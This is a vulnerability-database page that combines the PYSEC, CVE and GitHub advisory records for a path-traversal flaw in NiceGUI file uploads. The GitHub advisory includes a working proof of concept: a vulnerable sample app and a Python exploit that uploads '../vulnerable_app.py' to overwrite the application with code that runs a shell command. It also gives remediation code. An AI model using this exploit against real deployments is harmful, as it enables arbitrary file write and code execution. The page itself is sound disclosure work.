Vulnerability-Lookup

PYSEC-2026-95

Vulnerability from pysec - Published: 2026-02-06 22:16 - Updated: 2026-05-20 09:19

Details

NiceGUI is a Python-based UI framework. Prior to 3.7.0, NiceGUI's FileUpload.name property exposes client-supplied filename metadata without sanitization, enabling path traversal when developers use the pattern UPLOAD_DIR / file.name. Malicious filenames containing ../ sequences allow attackers to write files outside intended directories, with potential for remote code execution through application file overwrites in vulnerable deployment patterns. This design creates a prevalent security footgun affecting applications following common community patterns. Note: Exploitation requires application code incorporating file.name into filesystem paths without sanitization. Applications using fixed paths, generated filenames, or explicit sanitization are not affected. This vulnerability is fixed in 3.7.0.

Severity

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Impacted products

Name	purl
nicegui	pkg:pypi/nicegui

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "nicegui",
        "purl": "pkg:pypi/nicegui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.1.0",
        "0.1.4",
        "0.1.6",
        "0.2.0",
        "0.2.1",
        "0.2.10",
        "0.2.11",
        "0.2.12",
        "0.2.13",
        "0.2.14",
        "0.2.15",
        "0.2.2",
        "0.2.3",
        "0.2.4",
        "0.2.9",
        "0.3.0",
        "0.3.1",
        "0.3.2",
        "0.3.3",
        "0.3.4",
        "0.3.5",
        "0.3.6",
        "0.3.7",
        "0.3.8",
        "0.3.9",
        "0.4.0",
        "0.4.1",
        "0.4.10",
        "0.4.11",
        "0.4.12",
        "0.4.13",
        "0.4.14",
        "0.4.15",
        "0.4.2",
        "0.4.3",
        "0.4.4",
        "0.4.5",
        "0.4.6",
        "0.4.7",
        "0.4.8",
        "0.4.9",
        "0.5.0",
        "0.5.1",
        "0.5.10",
        "0.5.11",
        "0.5.12",
        "0.5.2",
        "0.5.3",
        "0.5.4",
        "0.5.5",
        "0.5.6",
        "0.5.7",
        "0.5.8",
        "0.5.9",
        "0.6.0",
        "0.6.1",
        "0.6.10",
        "0.6.11",
        "0.6.12",
        "0.6.13",
        "0.6.2",
        "0.6.3",
        "0.6.4",
        "0.6.5",
        "0.6.6",
        "0.6.7",
        "0.6.8",
        "0.6.9",
        "0.7.0",
        "0.7.1",
        "0.7.10",
        "0.7.11",
        "0.7.12",
        "0.7.13",
        "0.7.14",
        "0.7.15",
        "0.7.16",
        "0.7.17",
        "0.7.18",
        "0.7.19",
        "0.7.2",
        "0.7.21",
        "0.7.22",
        "0.7.23",
        "0.7.24",
        "0.7.25",
        "0.7.26",
        "0.7.27",
        "0.7.28",
        "0.7.29",
        "0.7.3",
        "0.7.30",
        "0.7.4",
        "0.7.6",
        "0.7.7",
        "0.7.8",
        "0.7.9",
        "0.8.0",
        "0.8.1",
        "0.8.10",
        "0.8.11",
        "0.8.12",
        "0.8.13",
        "0.8.14",
        "0.8.15",
        "0.8.16",
        "0.8.2",
        "0.8.3",
        "0.8.4",
        "0.8.5",
        "0.8.6",
        "0.8.7",
        "0.8.8",
        "0.8.9",
        "0.9.0",
        "0.9.1",
        "0.9.10",
        "0.9.11",
        "0.9.12",
        "0.9.13",
        "0.9.14",
        "0.9.15",
        "0.9.16",
        "0.9.17",
        "0.9.18",
        "0.9.19",
        "0.9.2",
        "0.9.20",
        "0.9.21",
        "0.9.22",
        "0.9.23",
        "0.9.24",
        "0.9.25",
        "0.9.26",
        "0.9.27",
        "0.9.28",
        "0.9.3",
        "0.9.4",
        "0.9.5",
        "0.9.6",
        "0.9.7",
        "0.9.8",
        "0.9.9",
        "1.0.1",
        "1.0.10",
        "1.0.2",
        "1.0.3",
        "1.0.4",
        "1.0.5",
        "1.0.6",
        "1.0.7",
        "1.0.8",
        "1.0.9",
        "1.1.0",
        "1.1.1",
        "1.1.10",
        "1.1.11",
        "1.1.2",
        "1.1.3",
        "1.1.4",
        "1.1.5",
        "1.1.6",
        "1.1.7",
        "1.1.8",
        "1.1.9",
        "1.2.0",
        "1.2.1",
        "1.2.10",
        "1.2.11",
        "1.2.12",
        "1.2.13",
        "1.2.14",
        "1.2.15",
        "1.2.16",
        "1.2.17",
        "1.2.18",
        "1.2.2",
        "1.2.20",
        "1.2.21",
        "1.2.22",
        "1.2.23",
        "1.2.24",
        "1.2.3",
        "1.2.4",
        "1.2.5",
        "1.2.6",
        "1.2.7",
        "1.2.8",
        "1.2.9",
        "1.3.0",
        "1.3.1",
        "1.3.10",
        "1.3.11",
        "1.3.12",
        "1.3.13",
        "1.3.14",
        "1.3.15",
        "1.3.16",
        "1.3.17",
        "1.3.18",
        "1.3.2",
        "1.3.3",
        "1.3.4",
        "1.3.5",
        "1.3.6",
        "1.3.7",
        "1.3.8",
        "1.3.9",
        "1.4.0",
        "1.4.1",
        "1.4.10",
        "1.4.11",
        "1.4.12",
        "1.4.13",
        "1.4.14",
        "1.4.15",
        "1.4.16",
        "1.4.17",
        "1.4.18",
        "1.4.19",
        "1.4.2",
        "1.4.20",
        "1.4.21",
        "1.4.22",
        "1.4.23",
        "1.4.24",
        "1.4.25",
        "1.4.26",
        "1.4.27",
        "1.4.28",
        "1.4.29",
        "1.4.3",
        "1.4.30",
        "1.4.31",
        "1.4.33",
        "1.4.34",
        "1.4.35",
        "1.4.36",
        "1.4.37",
        "1.4.4",
        "1.4.5",
        "1.4.6",
        "1.4.7",
        "1.4.8",
        "1.4.9",
        "2.0.0",
        "2.0.1",
        "2.1.0",
        "2.10.0",
        "2.10.1",
        "2.11.0",
        "2.11.1",
        "2.12.0",
        "2.12.1",
        "2.13.0",
        "2.14.0",
        "2.14.1",
        "2.15.0",
        "2.16.0",
        "2.16.1",
        "2.17.0",
        "2.18.0",
        "2.19.0",
        "2.2.0",
        "2.20.0",
        "2.21.0",
        "2.21.1",
        "2.22.0",
        "2.22.1",
        "2.22.2",
        "2.23.0",
        "2.23.1",
        "2.23.2",
        "2.23.3",
        "2.24.0",
        "2.24.1",
        "2.24.2",
        "2.3.0",
        "2.4.0",
        "2.5.0",
        "2.7.0",
        "2.8.0",
        "2.8.1",
        "2.9.0",
        "2.9.1",
        "3.0.0",
        "3.0.0rc1",
        "3.0.1",
        "3.0.2",
        "3.0.3",
        "3.0.4",
        "3.1.0",
        "3.2.0",
        "3.3.0",
        "3.3.1",
        "3.4.0",
        "3.4.1",
        "3.5.0",
        "3.6.0",
        "3.6.1"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25732",
    "GHSA-9ffm-fxg3-xrhh"
  ],
  "details": "NiceGUI is a Python-based UI framework. Prior to 3.7.0, NiceGUI\u0027s FileUpload.name property exposes client-supplied filename metadata without sanitization, enabling path traversal when developers use the pattern UPLOAD_DIR / file.name. Malicious filenames containing ../ sequences allow attackers to write files outside intended directories, with potential for remote code execution through application file overwrites in vulnerable deployment patterns. This design creates a prevalent security footgun affecting applications following common community patterns. Note: Exploitation requires application code incorporating file.name into filesystem paths without sanitization. Applications using fixed paths, generated filenames, or explicit sanitization are not affected. This vulnerability is fixed in 3.7.0.",
  "id": "PYSEC-2026-95",
  "modified": "2026-05-20T09:19:09.073192Z",
  "published": "2026-02-06T22:16:11.993Z",
  "references": [
    {
      "type": "FIX",
      "url": "https://github.com/zauberzeug/nicegui/blob/main/nicegui/elements/upload_files.py#L110-L115"
    },
    {
      "type": "FIX",
      "url": "https://github.com/zauberzeug/nicegui/blob/main/nicegui/elements/upload_files.py#L79-L82"
    },
    {
      "type": "EVIDENCE",
      "url": "https://github.com/zauberzeug/nicegui/security/advisories/GHSA-9ffm-fxg3-xrhh"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

CVE-2026-25732 (GCVE-0-2026-25732)

Vulnerability from cvelistv5 – Published: 2026-02-06 21:09 – Updated: 2026-02-09 15:27

Title

NiceGUI's Path Traversal via Unsanitized FileUpload.name Enables Arbitrary File Write

Summary

Severity

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

3 references

URL	Tags
https://github.com/zauberzeug/nicegui/security/ad…	x_refsource_CONFIRM
https://github.com/zauberzeug/nicegui/blob/main/n…	x_refsource_MISC
https://github.com/zauberzeug/nicegui/blob/main/n…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
zauberzeug	nicegui	Affected: < 3.7.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-25732",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-09T15:21:57.559457Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-09T15:27:21.089Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "nicegui",
          "vendor": "zauberzeug",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.7.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "NiceGUI is a Python-based UI framework. Prior to 3.7.0, NiceGUI\u0027s FileUpload.name property exposes client-supplied filename metadata without sanitization, enabling path traversal when developers use the pattern UPLOAD_DIR / file.name. Malicious filenames containing ../ sequences allow attackers to write files outside intended directories, with potential for remote code execution through application file overwrites in vulnerable deployment patterns. This design creates a prevalent security footgun affecting applications following common community patterns. Note: Exploitation requires application code incorporating file.name into filesystem paths without sanitization. Applications using fixed paths, generated filenames, or explicit sanitization are not affected. This vulnerability is fixed in 3.7.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-06T21:09:58.389Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/zauberzeug/nicegui/security/advisories/GHSA-9ffm-fxg3-xrhh",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/zauberzeug/nicegui/security/advisories/GHSA-9ffm-fxg3-xrhh"
        },
        {
          "name": "https://github.com/zauberzeug/nicegui/blob/main/nicegui/elements/upload_files.py#L110-L115",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/zauberzeug/nicegui/blob/main/nicegui/elements/upload_files.py#L110-L115"
        },
        {
          "name": "https://github.com/zauberzeug/nicegui/blob/main/nicegui/elements/upload_files.py#L79-L82",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/zauberzeug/nicegui/blob/main/nicegui/elements/upload_files.py#L79-L82"
        }
      ],
      "source": {
        "advisory": "GHSA-9ffm-fxg3-xrhh",
        "discovery": "UNKNOWN"
      },
      "title": "NiceGUI\u0027s Path Traversal via Unsanitized FileUpload.name Enables Arbitrary File Write"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25732",
    "datePublished": "2026-02-06T21:09:58.389Z",
    "dateReserved": "2026-02-05T16:48:00.427Z",
    "dateUpdated": "2026-02-09T15:27:21.089Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

GHSA-9FFM-FXG3-XRHH

Vulnerability from github – Published: 2026-02-05 21:08 – Updated: 2026-02-07 00:31

Summary

NiceGUI's Path Traversal via Unsanitized FileUpload.name Enables Arbitrary File Write

Details

Summary

NiceGUI's FileUpload.name property exposes client-supplied filename metadata without sanitization, enabling path traversal when developers use the pattern UPLOAD_DIR / file.name. Malicious filenames containing ../ sequences allow attackers to write files outside intended directories, with potential for remote code execution through application file overwrites in vulnerable deployment patterns. This design creates a prevalent security footgun affecting applications following common community patterns.

Note: Exploitation requires application code incorporating file.name into filesystem paths without sanitization. Applications using fixed paths, generated filenames, or explicit sanitization are not affected.

Details

Vulnerable Component: nicegui/elements/upload_files.py (upload_files.py#L79-L82 and upload_files.py#L110-L115)

Affected Methods: SmallFileUpload.save()and LargeFileUpload.save()

async def save(self, path: str | Path) -> None:
    target = Path(path)
    target.parent.mkdir(parents=True, exist_ok=True)
    await run.io_bound(target.write_bytes, self._data)

Root Cause: The save() method performs no validation on the provided path parameter. It accepts: - Relative paths with ../ sequences - Absolute paths - Any file system location writable by the process

When developers use e.file.name (controlled by the attacker) in constructing save paths, directory traversal occurs:

save_path = UPLOAD_DIR / e.file.name  # e.file.name = "../app.py"
await e.file.save(save_path)           # Writes outside UPLOAD_DIR

PoC

Terminal 1 (App)

cd /tmp && mkdir -p evilgui && cd evilgui
python3 -m venv evilgui && source evilgui/bin/activate
pip install nicegui

cat > vulnerable_app.py << 'EOF'
from nicegui import ui
from pathlib import Path

UPLOAD_DIR = Path('./uploads')
UPLOAD_DIR.mkdir(exist_ok=True)

@ui.page('/')
def index():
    async def handle_upload(e):
        save_path = UPLOAD_DIR / e.file.name
        await e.file.save(save_path)
        ui.notify(f'File saved: {e.file.name}')

    ui.upload(on_upload=handle_upload, auto_upload=True)

ui.run(port=8080, reload=False)
EOF

python3 vulnerable_app.py &

Terminal 2 (Exploit)

cat > exploit.py << 'EOF'
import requests, re, time

s = requests.Session()
s.get('http://localhost:8080')
time.sleep(2)

html = s.get('http://localhost:8080').text
match = re.search(r'/_nicegui/client/([^/]+)/upload/(\d+)', html)
upload_url = f'http://localhost:8080/_nicegui/client/{match[1]}/upload/{match[2]}'

payload = '''from nicegui import ui
import subprocess
@ui.page("/")
def index():
    ui.label(subprocess.check_output(["id"], text=True))
ui.run(port=8080, reload=False)
'''

s.post(upload_url, files={'file': ('../vulnerable_app.py', payload, 'text/x-python')})
EOF

python3 exploit.py

Restart the application to execute the injected code:

pkill -f vulnerable_app && python3 vulnerable_app.py

Observe http://localhost:8080

Impact

Affected Applications: All NiceGUI applications using ui.upload() where developers save files with e.file.save() and include user-controlled filenames (e.g., e.file.name) in the path.

Attack Capabilities: - Write files to any location writable by the application process - Overwrite Python application files to achieve remote code execution upon restart - Overwrite configuration files to alter application behavior - Write SSH keys, systemd units, or cron jobs for persistent access - Deny service by corrupting critical files

Exploitability: Trivially exploitable without authentication. Attackers simply upload a file with a malicious filename like ../../../app.py to escape the upload directory. The vulnerability is prevalent in production applications as developers naturally use e.file.name directly, following patterns shown in community examples.

Remediation

For Users

async def handle_upload(e):
    safe_name = Path(e.file.name).name # Strip directory components!
    await e.file.save(UPLOAD_DIR / safe_name)

For Maintainers

```py async def save(self, path: str | Path, *, base_dir: Path | None = None) -> None: target = Path(path).resolve()

if base_dir is not None:
    base_dir = base_dir.resolve()
    if not target.is_relative_to(base_dir):
        raise ValueError(
            f"Path '{target}' escapes base directory '{base_dir}'"
        )

target.parent.mkdir(parents=True, exist_ok=True)
await run.io_bound(target.write_bytes, self._data)

````

Severity

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.6.1"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "nicegui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25732"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-601"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-05T21:08:53Z",
    "nvd_published_at": "2026-02-06T22:16:11Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nNiceGUI\u0027s `FileUpload.name` property exposes client-supplied filename metadata without sanitization, enabling path traversal when developers use the pattern `UPLOAD_DIR / file.name`. Malicious filenames containing `../` sequences allow attackers to write files outside intended directories, with potential for remote code execution through application file overwrites in vulnerable deployment patterns. This design creates a prevalent security footgun affecting applications following common community patterns.\n\n**Note**: Exploitation requires application code incorporating `file.name` into filesystem paths without sanitization. Applications using fixed paths, generated filenames, or explicit sanitization are not affected.\n\n### Details\n**Vulnerable Component**: `nicegui/elements/upload_files.py` ([upload_files.py#L79-L82](https://github.com/zauberzeug/nicegui/blob/main/nicegui/elements/upload_files.py#L79-L82) and [upload_files.py#L110-L115](https://github.com/zauberzeug/nicegui/blob/main/nicegui/elements/upload_files.py#L110-L115))\n\n**Affected Methods**: `SmallFileUpload.save()`and `LargeFileUpload.save()`\n\n```py\nasync def save(self, path: str | Path) -\u003e None:\n    target = Path(path)\n    target.parent.mkdir(parents=True, exist_ok=True)\n    await run.io_bound(target.write_bytes, self._data)\n```\n\n**Root Cause**: The `save()` method performs no validation on the provided path parameter. It accepts:\n- Relative paths with `../` sequences\n- Absolute paths\n- Any file system location writable by the process\n\nWhen developers use `e.file.name` (controlled by the attacker) in constructing save paths, directory traversal occurs:\n```py\nsave_path = UPLOAD_DIR / e.file.name  # e.file.name = \"../app.py\"\nawait e.file.save(save_path)           # Writes outside UPLOAD_DIR\n```\n\n### PoC\n- Terminal 1 (App)\n```bash\ncd /tmp \u0026\u0026 mkdir -p evilgui \u0026\u0026 cd evilgui\npython3 -m venv evilgui \u0026\u0026 source evilgui/bin/activate\npip install nicegui\n\ncat \u003e vulnerable_app.py \u003c\u003c \u0027EOF\u0027\nfrom nicegui import ui\nfrom pathlib import Path\n\nUPLOAD_DIR = Path(\u0027./uploads\u0027)\nUPLOAD_DIR.mkdir(exist_ok=True)\n\n@ui.page(\u0027/\u0027)\ndef index():\n    async def handle_upload(e):\n        save_path = UPLOAD_DIR / e.file.name\n        await e.file.save(save_path)\n        ui.notify(f\u0027File saved: {e.file.name}\u0027)\n    \n    ui.upload(on_upload=handle_upload, auto_upload=True)\n\nui.run(port=8080, reload=False)\nEOF\n\npython3 vulnerable_app.py \u0026\n```\n\n- Terminal 2 (Exploit)\n```bash\ncat \u003e exploit.py \u003c\u003c \u0027EOF\u0027\nimport requests, re, time\n\ns = requests.Session()\ns.get(\u0027http://localhost:8080\u0027)\ntime.sleep(2)\n\nhtml = s.get(\u0027http://localhost:8080\u0027).text\nmatch = re.search(r\u0027/_nicegui/client/([^/]+)/upload/(\\d+)\u0027, html)\nupload_url = f\u0027http://localhost:8080/_nicegui/client/{match[1]}/upload/{match[2]}\u0027\n\npayload = \u0027\u0027\u0027from nicegui import ui\nimport subprocess\n@ui.page(\"/\")\ndef index():\n    ui.label(subprocess.check_output([\"id\"], text=True))\nui.run(port=8080, reload=False)\n\u0027\u0027\u0027\n\ns.post(upload_url, files={\u0027file\u0027: (\u0027../vulnerable_app.py\u0027, payload, \u0027text/x-python\u0027)})\nEOF\n\npython3 exploit.py\n```\n- Restart the application to execute the injected code:\n```\npkill -f vulnerable_app \u0026\u0026 python3 vulnerable_app.py\n```\n- Observe http://localhost:8080\n\n### Impact\n**Affected Applications**: All NiceGUI applications using `ui.upload()` where developers save files with `e.file.save()` and include user-controlled filenames (e.g., `e.file.name`) in the path.\n\n**Attack Capabilities**:\n- Write files to any location writable by the application process\n- Overwrite Python application files to achieve remote code execution upon restart\n- Overwrite configuration files to alter application behavior\n- Write SSH keys, systemd units, or cron jobs for persistent access\n- Deny service by corrupting critical files\n\n**Exploitability**: Trivially exploitable without authentication. Attackers simply upload a file with a malicious filename like `../../../app.py` to escape the upload directory. The vulnerability is prevalent in production applications as developers naturally use `e.file.name` directly, following patterns shown in community examples.\n\n### Remediation\n#### For Users\n```py\nasync def handle_upload(e):\n    safe_name = Path(e.file.name).name # Strip directory components!\n    await e.file.save(UPLOAD_DIR / safe_name)\n```\n\n#### For Maintainers\n```py\nasync def save(self, path: str | Path, *, base_dir: Path | None = None) -\u003e None:\n    target = Path(path).resolve()\n    \n    if base_dir is not None:\n        base_dir = base_dir.resolve()\n        if not target.is_relative_to(base_dir):\n            raise ValueError(\n                f\"Path \u0027{target}\u0027 escapes base directory \u0027{base_dir}\u0027\"\n            )\n    \n    target.parent.mkdir(parents=True, exist_ok=True)\n    await run.io_bound(target.write_bytes, self._data)\n````",
  "id": "GHSA-9ffm-fxg3-xrhh",
  "modified": "2026-02-07T00:31:58Z",
  "published": "2026-02-05T21:08:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/zauberzeug/nicegui/security/advisories/GHSA-9ffm-fxg3-xrhh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25732"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/zauberzeug/nicegui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zauberzeug/nicegui/blob/main/nicegui/elements/upload_files.py#L110-L115"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zauberzeug/nicegui/blob/main/nicegui/elements/upload_files.py#L79-L82"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "NiceGUI\u0027s Path Traversal via Unsanitized FileUpload.name Enables Arbitrary File Write"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

PYSEC-2026-95

CVE-2026-25732 (GCVE-0-2026-25732)

GHSA-9FFM-FXG3-XRHH

Summary

Details

PoC

Impact

Remediation

For Users

For Maintainers

Tags

Sightings

Nomenclature